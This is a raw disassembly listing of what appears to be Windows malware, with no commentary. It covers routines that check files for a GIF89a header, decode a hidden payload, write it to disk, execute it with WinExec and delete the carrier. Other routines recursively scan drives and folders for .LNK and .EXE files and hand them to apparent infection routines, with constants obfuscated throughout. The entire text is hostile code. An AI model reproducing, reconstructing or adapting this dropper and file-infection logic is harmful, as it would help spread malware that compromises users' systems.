lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
push dword_44B0EC
push 3
push 0
mov eax, dword_44B0A8
movsx edx, word_44B12C
add eax, edx
sub eax, 8
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_43B6B7
mov eax, 2Ah
jmp short loc_43B721
; ---------------------------------------------------------------------------
loc_43B6B7: ; CODE XREF: sub_43B609+A5�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_26C], eax
push edi
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B110
sub eax, 8
cmp [ebp+var_26C], eax
jnz short loc_43B6F7
mov eax, 2Ah
jmp short loc_43B721
; ---------------------------------------------------------------------------
loc_43B6F7: ; CODE XREF: sub_43B609+E5�j
movzx eax, [ebp+var_203]
movsx edx, word_44B13C
mov ecx, dword_44B124
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_43B71A
mov eax, 2Ah
jmp short loc_43B721
; ---------------------------------------------------------------------------
loc_43B71A: ; CODE XREF: sub_43B609+108�j
movzx eax, [ebp+var_203]
loc_43B721: ; CODE XREF: sub_43B609+AC�j
; sub_43B609+EC�j ...
pop edi
pop esi
leave
retn
sub_43B609 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B725 proc near ; CODE XREF: sub_43BF7B+25A�p
; sub_440516+2BA�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call ds:dword_44A630
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_444C90
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_43B753: ; CODE XREF: sub_43B725+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B753
movsx edx, word_44B120
movsx ecx, word_44B0B8
add edx, ecx
sub edx, 9
mov ebx, eax
sub ebx, edx
movsx edx, word_44B0F4
mov [ebp+ebx+var_316], dl
mov edi, dword_44B138
sub edi, 2
loc_43B788: ; CODE XREF: sub_43B725+16E�j
mov eax, edi
mov ecx, dword_44B0D0
movsx ebx, word_44B0A0
add ecx, ebx
sub ecx, 3
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word_44B0E0
sub ecx, 6
mul ecx
mov [ebp+var_324], eax
mov eax, dword_44B0A8
sub eax, 3
mov edx, [ebp+var_324]
add edx, eax
mov eax, dword_44B0C4
sub eax, 4
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
movsx edx, word_44B130
sub edx, 4
cmp eax, edx
jnz loc_43B892
mov eax, edi
mov ecx, dword_44B0BC
inc ecx
mul ecx
mov [ebp+var_328], eax
movsx eax, word_44B12C
sub eax, 2
mov edx, [ebp+var_328]
add edx, eax
mov eax, dword_44B0C8
movsx ecx, word_44B140
add eax, ecx
sub eax, 0Bh
mov [ebp+edx+var_212], al
mov eax, dword_44B0D0
mov [ebp+var_32C], eax
mov eax, edi
mov ecx, dword_44B144
add ecx, 2
mov edx, [ebp+var_32C]
add ecx, edx
mul ecx
mov [ebp+var_330], eax
movsx eax, word_44B0E4
mov edx, [ebp+var_32C]
add eax, edx
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
mov eax, dword_44B0DC
sub eax, 8
mov [ebp+edx+var_212], al
jmp short loc_43B898
; ---------------------------------------------------------------------------
loc_43B892: ; CODE XREF: sub_43B725+DB�j
inc edi
jmp loc_43B788
; ---------------------------------------------------------------------------
loc_43B898: ; CODE XREF: sub_43B725+16B�j
cmp dword_44B16C, 0
jz short loc_43B8D7
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_447600
mov esi, eax
or esi, esi
jz short loc_43B8D7
cmp dword_44B170, 0
jz short loc_43B8F8
mov eax, dword_44B0D4
inc eax
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call ds:dword_44501C
loc_43B8D7: ; CODE XREF: sub_43B725+17A�j
; sub_43B725+18F�j
push ds:dword_447610
push ds:off_44A610
lea eax, [ebp+var_316]
push eax
call sub_442961
add esp, 0Ch
mov [ebp+var_31C], eax
loc_43B8F8: ; CODE XREF: sub_43B725+198�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B725 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B8FD proc near ; DATA XREF: sub_43D966+8C�o
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_1FE = byte ptr -1FEh
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp+var_210]
push eax
push offset dword_4470F0
call sub_43DC1A
add esp, 8
mov [ebp+var_208], eax
test eax, eax
jnz short loc_43B92E
xor eax, eax
jmp loc_43BAB8
; ---------------------------------------------------------------------------
loc_43B92E: ; CODE XREF: sub_43B8FD+28�j
movsx eax, word_44B11C
mov edx, dword_44B094
lea eax, [eax+edx+2]
mov [ebp+var_204], eax
loc_43B945: ; CODE XREF: sub_43B8FD+1A7�j
mov eax, [ebp+var_204]
mov edx, [ebp+var_208]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_43B957: ; CODE XREF: sub_43B8FD+5F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B957
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0FFh
jnb short loc_43B995
mov eax, [ebp+var_204]
movsx edx, word_44B090
sub edx, 1
add eax, edx
add eax, [ebp+var_208]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_444C90
loc_43B995: ; CODE XREF: sub_43B8FD+71�j
mov esi, dword_44B100
sub esi, 3
jmp short loc_43B9C5
; ---------------------------------------------------------------------------
loc_43B9A0: ; CODE XREF: sub_43B8FD+DA�j
cmp [ebp+esi+var_FF], 28h
jnz short loc_43B9B2
mov [ebp+esi+var_FF], 2Bh
loc_43B9B2: ; CODE XREF: sub_43B8FD+AB�j
cmp [ebp+esi+var_FF], 29h
jnz short loc_43B9C4
mov [ebp+esi+var_FF], 3Dh
loc_43B9C4: ; CODE XREF: sub_43B8FD+BD�j
inc esi
loc_43B9C5: ; CODE XREF: sub_43B8FD+A1�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_43B9CE: ; CODE XREF: sub_43B8FD+D6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B9CE
cmp esi, eax
jb short loc_43B9A0
push 0FFh
lea eax, [ebp+var_1FE]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_43B2DF
add esp, 0Ch
mov ebx, eax
mov edi, dword_44B0B0
sub edi, 5
jmp short loc_43BA2F
; ---------------------------------------------------------------------------
loc_43BA01: ; CODE XREF: sub_43B8FD+134�j
movsx eax, [ebp+edi+var_1FE]
mov [ebp+var_218], eax
mov eax, edi
mul edi
mov [ebp+var_21C], eax
mov eax, [ebp+var_218]
mov edx, [ebp+var_21C]
sub eax, edx
mov [ebp+edi+var_1FE], al
inc edi
loc_43BA2F: ; CODE XREF: sub_43B8FD+102�j
cmp edi, ebx
jb short loc_43BA01
movsx eax, word_44B090
dec eax
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1FE]
push eax
call sub_43F8DA
add esp, 0Ch
mov [ebp+var_214], eax
mov eax, dword_44B104
add eax, 0FFFDh
cmp [ebp+var_214], eax
jz short loc_43BA77
push [ebp+var_208]
call ds:dword_447618 ; LocalFree
xor eax, eax
inc eax
jmp short loc_43BAB8
; ---------------------------------------------------------------------------
loc_43BA77: ; CODE XREF: sub_43B8FD+167�j
mov eax, [ebp+var_20C]
movsx edx, word_44B0F0
movsx ecx, word_44B0A4
add edx, ecx
sub edx, 5
add eax, edx
add [ebp+var_204], eax
mov eax, [ebp+var_210]
cmp [ebp+var_204], eax
jb loc_43B945
push [ebp+var_208]
call ds:dword_447618 ; LocalFree
xor eax, eax
loc_43BAB8: ; CODE XREF: sub_43B8FD+2C�j
; sub_43B8FD+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B8FD endp
; =============== S U B R O U T I N E =======================================
sub_43BABD proc near ; DATA XREF: .data:0044B220�o
mov eax, 80004001h
retn 8
sub_43BABD endp
; =============== S U B R O U T I N E =======================================
sub_43BAC5 proc near ; DATA XREF: .data:0044B224�o
mov eax, 80004001h
retn 10h
sub_43BAC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BACD proc near ; DATA XREF: .data:0044B238�o
push ebp
mov ebp, esp
push offset dword_44ABA8
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_44ABA8
pop ebp
retn 4
sub_43BACD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BAE4 proc near ; CODE XREF: sub_440E84+225�p
; sub_440E84+237�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBF = byte ptr -30DBFh
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D47 = byte ptr -30D47h
var_30D46 = byte ptr -30D46h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_444C70
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, dword_44B124
sub eax, 2
push eax
push 3
push 0
movsx eax, word_44B0A0
sub eax, 5
push eax
push 80000000h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_43BF76
push 0
lea eax, [ebp+var_30E4C]
push eax
movsx eax, word_44B140
add eax, 7Dh
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call ds:dword_445028 ; ReadFile
mov [ebp+var_30E44], eax
movsx eax, word_44B0E4
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_43BF58
cmp [ebp+var_30E3F], 47h
jnz short loc_43BBAE
cmp [ebp+var_30E3E], 49h
jnz short loc_43BBAE
cmp [ebp+var_30E3D], 46h
jnz short loc_43BBAE
cmp [ebp+var_30E3C], 38h
jnz short loc_43BBAE
cmp [ebp+var_30E3B], 39h
jnz short loc_43BBAE
cmp [ebp+var_30E3A], 61h
jz short loc_43BBB3
loc_43BBAE: ; CODE XREF: sub_43BAE4+9B�j
; sub_43BAE4+A4�j ...
jmp loc_43BF58
; ---------------------------------------------------------------------------
loc_43BBB3: ; CODE XREF: sub_43BAE4+C8�j
movzx eax, [ebp+var_30E15]
mov edx, dword_44B0C8
add edx, 2Fh
movsx ecx, word_44B120
add edx, ecx
cmp eax, edx
jnz short loc_43BBE2
cmp [ebp+var_30DBE], 3Dh
jnz short loc_43BBE2
cmp [ebp+var_30DBD], 3Dh
jz short loc_43BBE7
loc_43BBE2: ; CODE XREF: sub_43BAE4+EA�j
; sub_43BAE4+F3�j
jmp loc_43BF58
; ---------------------------------------------------------------------------
loc_43BBE7: ; CODE XREF: sub_43BAE4+FC�j
or ebx, ebx
jnz short loc_43BC16
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_43B609
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_43BF58
loc_43BC16: ; CODE XREF: sub_43BAE4+105�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call ds:dword_445028 ; ReadFile
mov [ebp+var_30E44], eax
mov eax, dword_44B094
movsx edx, word_44B0A4
add eax, edx
sub eax, 5
cmp [ebp+var_30E44], eax
jz loc_43BF58
mov eax, [ebp+var_30E4C]
mov edx, dword_44B0A8
add edx, dword_44B0C0
sub edx, 7
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_43B2DF
add esp, 0Ch
mov esi, eax
mov edi, dword_44B0BC
dec edi
jmp short loc_43BCE1
; ---------------------------------------------------------------------------
loc_43BC9C: ; CODE XREF: sub_43BAE4+1FF�j
or ebx, ebx
jz short loc_43BCB3
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_43BCE0
; ---------------------------------------------------------------------------
loc_43BCB3: ; CODE XREF: sub_43BAE4+1BA�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_43BCE0: ; CODE XREF: sub_43BAE4+1CD�j
inc edi
loc_43BCE1: ; CODE XREF: sub_43BAE4+1B6�j
cmp edi, esi
jb short loc_43BC9C
or ebx, ebx
jz short loc_43BD15
movsx eax, word_44B13C
movsx edx, word_44B108
add eax, edx
sub eax, 0Bh
mov edx, esi
sub edx, eax
mov eax, dword_44B110
add eax, dword_44B098
sub eax, 0Dh
mov [ebp+edx+var_30D40], al
loc_43BD15: ; CODE XREF: sub_43BAE4+203�j
movsx eax, word_44B114
mov edx, dword_44B148
sub edx, 2
mov [ebp+eax+var_30DBF], dl
push 0FFh
lea eax, [ebp+var_61D98]
push eax
lea eax, [ebp+var_30E14]
push eax
call sub_43B2DF
lea eax, [ebp+var_61D98]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
call sub_4407DD
add esp, 18h
mov [ebp+var_30E44], eax
mov eax, dword_44B098
sub eax, 5
cmp [ebp+var_30E44], eax
jnz loc_43BF58
mov [ebp+var_30F50], 1
or ebx, ebx
jz loc_43BEB8
movsx eax, word_44B0CC
cmp [ebp+eax+var_30D47], 64h
jnz loc_43BE20
movzx eax, [ebp+var_30D3F]
movsx edx, word_44B13C
mov ecx, dword_44B110
lea edx, [edx+ecx+11h]
sub eax, edx
mov byte ptr [ebp+var_61D9C+3], al
movzx eax, byte ptr [ebp+var_61D9C+3]
push eax
push 0
call sub_441E11
movsx eax, word_44B118
sub eax, 9
mov ds:dword_44761C, eax
movsx eax, word_44B0CC
movsx edx, word_44B0B4
add eax, edx
sub eax, 0Ch
mov dword_44B210, eax
movsx eax, word_44B0B8
mov edx, dword_44B0D0
mov [ebp+eax+var_30D40], dl
movsx eax, word_44B0F0
sub eax, 4
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_443DC1
add esp, 10h
loc_43BE20: ; CODE XREF: sub_43BAE4+2B2�j
mov eax, dword_44B0A8
movsx edx, word_44B0B8
add eax, edx
cmp [ebp+eax+var_30D46], 67h
jnz loc_43BF58
mov eax, dword_44B0BC
add eax, 6
add eax, dword_44B09C
mov edx, dword_44B0EC
mov [ebp+eax+var_30D40], dl
lea eax, [ebp+var_30D3F]
push eax
call ds:dword_445054
mov [ebp+var_61D9C], eax
push eax
push offset dword_44A670
call sub_442143
mov eax, dword_44B148
add eax, dword_44B0FC
sub eax, 5
mov ds:dword_44761C, eax
movsx eax, word_44B0F0
add eax, dword_44B138
sub eax, 7
mov dword_44B210, eax
mov eax, dword_44B0AC
dec eax
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_443DC1
add esp, 14h
jmp loc_43BF58
; ---------------------------------------------------------------------------
loc_43BEB8: ; CODE XREF: sub_43BAE4+29D�j
mov eax, dword_44B104
add eax, 5
push eax
lea eax, [ebp+var_30F4B]
push eax
call sub_443D65
push offset word_44C746
call sub_43DF30
push eax
lea edx, [ebp+var_30F4B]
push edx
call ds:dword_445020
push 0
push 80h
push 2
push 0
movsx eax, word_44B0F4
push eax
push 40000000h
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_61C98], eax
push 0
lea eax, [ebp+var_30E4C]
push eax
push esi
lea eax, [ebp+var_30D40]
push eax
push [ebp+var_61C98]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_61C98]
call ds:dword_449650 ; CloseHandle
push 5
lea eax, [ebp+var_30F4B]
push eax
call ds:dword_4470E0 ; WinExec
movzx eax, [ebp+var_30F51]
push eax
call sub_43E013
add esp, 18h
loc_43BF58: ; CODE XREF: sub_43BAE4+8E�j
; sub_43BAE4:loc_43BBAE�j ...
push [ebp+var_30E48]
call ds:dword_449650 ; CloseHandle
cmp [ebp+var_30F50], 0
jz short loc_43BF76
push [ebp+arg_0]
call ds:dword_445008 ; DeleteFileA
loc_43BF76: ; CODE XREF: sub_43BAE4+4B�j
; sub_43BAE4+487�j
pop edi
pop esi
pop ebx
leave
retn
sub_43BAE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43BF7B proc near ; CODE XREF: sub_43BF7B+2BC�p
; sub_43BF7B+320�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_43BFA0
mov eax, dword_44B0EC
mov [ebp+var_248], eax
jmp loc_43C032
; ---------------------------------------------------------------------------
loc_43BFA0: ; CODE XREF: sub_43BF7B+13�j
mov edx, [ebp+arg_4]
mov ecx, dword_44B09C
movsx eax, word_44B0A0
add ecx, eax
sub ecx, 8
cmp ds:dword_447630[edx*4], ecx
jnz short loc_43BFDA
push ebx
call ds:dword_447608 ; FindClose
mov eax, dword_44B0D0
add eax, dword_44B0B0
sub eax, 4
push eax
call ds:dword_44A660 ; ExitThread
loc_43BFDA: ; CODE XREF: sub_43BF7B+41�j
mov eax, dword_44B138
add eax, 62h
mov [ebp+var_248], eax
push offset word_44C73E
call sub_43DF30
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call ds:dword_44A634
add esp, 10h
lea eax, [ebp+var_252]
push eax
call ds:dword_44A664 ; GetDriveTypeA
cmp eax, 3
jnz short loc_43C032
movsx eax, word_44B114
mov edx, dword_44B0C4
lea eax, [eax+edx+125h]
mov [ebp+var_248], eax
loc_43C032: ; CODE XREF: sub_43BF7B+20�j
; sub_43BF7B+9B�j
xor edi, edi
inc edi
push offset byte_44C737
call sub_43DF30
push esi
push eax
lea edx, [ebp+var_242]
push edx
call ds:dword_44A634
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43C056: ; CODE XREF: sub_43BF7B+E0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C056
mov edx, eax
movsx ecx, word_44B114
movsx eax, word_44B0CC
add ecx, eax
sub ecx, 5
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43C10E
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C083: ; CODE XREF: sub_43BF7B+10D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C083
movsx ecx, word_44B090
add ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Ch
jnz short loc_43C10E
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C0B0: ; CODE XREF: sub_43BF7B+13A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C0B0
movsx ecx, word_44B0B4
sub ecx, 2
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Eh
jnz short loc_43C10E
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C0DD: ; CODE XREF: sub_43BF7B+167�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C0DD
movsx ecx, word_44B0F0
sub ecx, 3
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 4Bh
jnz short loc_43C10E
push esi
call sub_440516
add esp, 4
loc_43C10E: ; CODE XREF: sub_43BF7B+FD�j
; sub_43BF7B+12E�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43C113: ; CODE XREF: sub_43BF7B+19D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C113
mov edx, eax
movsx ecx, word_44B11C
mov eax, dword_44B148
lea ecx, [ecx+eax+1]
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_43C1DD
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C13D: ; CODE XREF: sub_43BF7B+1C7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C13D
movsx ecx, word_44B0F4
add ecx, 4
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_43C1DD
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C16A: ; CODE XREF: sub_43BF7B+1F4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C16A
mov edx, eax
movsx ecx, word_44B0E4
movsx eax, word_44B0B4
add ecx, eax
sub ecx, 8
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 58h
jnz short loc_43C1DD
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_43C1A0: ; CODE XREF: sub_43BF7B+22A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C1A0
movsx ecx, word_44B0A0
add ecx, dword_44B098
sub ecx, 8
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_43C1DD
push [ebp+var_248]
push esi
call sub_43B725
add esp, 8
loc_43C1DD: ; CODE XREF: sub_43BF7B+1B7�j
; sub_43BF7B+1E8�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_448258 ; FindFirstFileA
mov ebx, eax
mov eax, dword_44B128
inc eax
neg eax
cmp ebx, eax
jz loc_43C2A7
cmp [ebp+var_112], 2Eh
jz loc_43C2A3
lea eax, [ebp+var_112]
push eax
push esi
push offset aSS ; "%s%s\\"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43BF7B
add esp, 1Ch
jmp short loc_43C2A3
; ---------------------------------------------------------------------------
loc_43C241: ; CODE XREF: sub_43BF7B+32A�j
lea eax, [ebp+var_13E]
push eax
push ebx
call ds:dword_446004 ; FindNextFileA
mov edi, eax
or edi, edi
jnz short loc_43C26B
push [ebp+var_248]
call ds:dword_44A630
pop ecx
push ebx
call ds:dword_447608 ; FindClose
jmp short loc_43C2A7
; ---------------------------------------------------------------------------
loc_43C26B: ; CODE XREF: sub_43BF7B+2D8�j
cmp [ebp+var_112], 2Eh
jz short loc_43C2A3
lea eax, [ebp+var_112]
push eax
push esi
push offset aSS ; "%s%s\\"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_43BF7B
add esp, 1Ch
loc_43C2A3: ; CODE XREF: sub_43BF7B+28F�j
; sub_43BF7B+2C4�j ...
or edi, edi
jnz short loc_43C241
loc_43C2A7: ; CODE XREF: sub_43BF7B+282�j
; sub_43BF7B+2EE�j
pop edi
pop esi
pop ebx
leave
retn
sub_43BF7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43C2AC proc near ; DATA XREF: sub_43D966+138�o
push ebp
mov ebp, esp
loc_43C2AF: ; CODE XREF: sub_43C2AC+33�j
call sub_43CA79
mov eax, dword_44B098
add eax, dword_44B110
sub eax, 0Bh
mov edx, dword_44B0C0
add edx, 0EA5Ah
add edx, dword_44B0D8
imul eax, edx
push eax
call ds:dword_44A630
pop ecx
jmp short loc_43C2AF
sub_43C2AC endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C2E5 proc near ; CODE XREF: sub_43A4DA+2�p
; sub_43A4DA+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
movsx eax, word_44B090
movsx edx, word_44B118
add eax, edx
sub eax, 0Bh
push eax
push 0
push [ebp+arg_0]
push 0
call ds:dword_447A44
mov edi, eax
or edi, edi
jnz short loc_43C348
push offset dword_44C72C
call sub_43DF30
push eax
lea edi, [ebp+var_104]
push edi
call ds:dword_445020
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_43BF7B
add esp, 18h
loc_43C348: ; CODE XREF: sub_43C2E5+36�j
pop edi
leave
retn
sub_43C2E5 endp
; =============== S U B R O U T I N E =======================================
sub_43C34B proc near ; DATA XREF: .data:0044B264�o
mov eax, 80004001h
retn 8
sub_43C34B endp
; =============== S U B R O U T I N E =======================================
sub_43C353 proc near ; DATA XREF: .data:0044B268�o
mov eax, 80004001h
retn 10h
sub_43C353 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C35B proc near ; CODE XREF: sub_440C54+168�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_43C3C0
xor eax, eax
jmp loc_43C47B
; ---------------------------------------------------------------------------
loc_43C393: ; CODE XREF: sub_43C35B+71�j
push esi
push [ebp+arg_0]
call sub_43DE83
add esp, 8
sub ebx, dword_44B10C
movsx eax, word_44B118
sub eax, 6
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
mov eax, dword_44B0AC
add eax, 2
lea esi, [esi+eax]
loc_43C3C0: ; CODE XREF: sub_43C35B+2F�j
movsx eax, word_44B13C
sub eax, 4
cmp ebx, eax
jnb short loc_43C393
mov eax, dword_44B144
add eax, dword_44B138
sub eax, 2
cmp ebx, eax
jbe short loc_43C451
push 3
mov eax, dword_44B10C
add eax, dword_44B104
sub eax, 5
push eax
lea eax, [ebp+var_7]
push eax
call ds:dword_449640
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call ds:dword_449634
push esi
lea eax, [ebp+var_7]
push eax
call sub_43DE83
add esp, 20h
movsx eax, word_44B114
mov byte ptr [esi+eax], 3Dh
mov eax, dword_44B0A8
sub eax, 3
cmp ebx, eax
jnz short loc_43C444
movsx eax, word_44B14C
movsx edx, word_44B0E4
add eax, edx
sub eax, 8
mov byte ptr [esi+eax], 3Dh
loc_43C444: ; CODE XREF: sub_43C35B+D0�j
movsx eax, word_44B118
sub eax, 5
lea esi, [esi+eax]
loc_43C451: ; CODE XREF: sub_43C35B+83�j
mov eax, dword_44B094
movsx edx, word_44B0F0
add eax, edx
sub eax, 5
movsx edx, word_44B14C
movsx ecx, word_44B0F4
add edx, ecx
sub edx, 4
mov [esi+eax], dl
xor eax, eax
inc eax
loc_43C47B: ; CODE XREF: sub_43C35B+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C35B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C480 proc near ; CODE XREF: sub_4402F1+C6�p
; sub_4402F1+11D�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43C496: ; CODE XREF: sub_43C480+1B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43C496
mov [ebp+var_4], eax
movsx edi, word_44B130
sub edi, 4
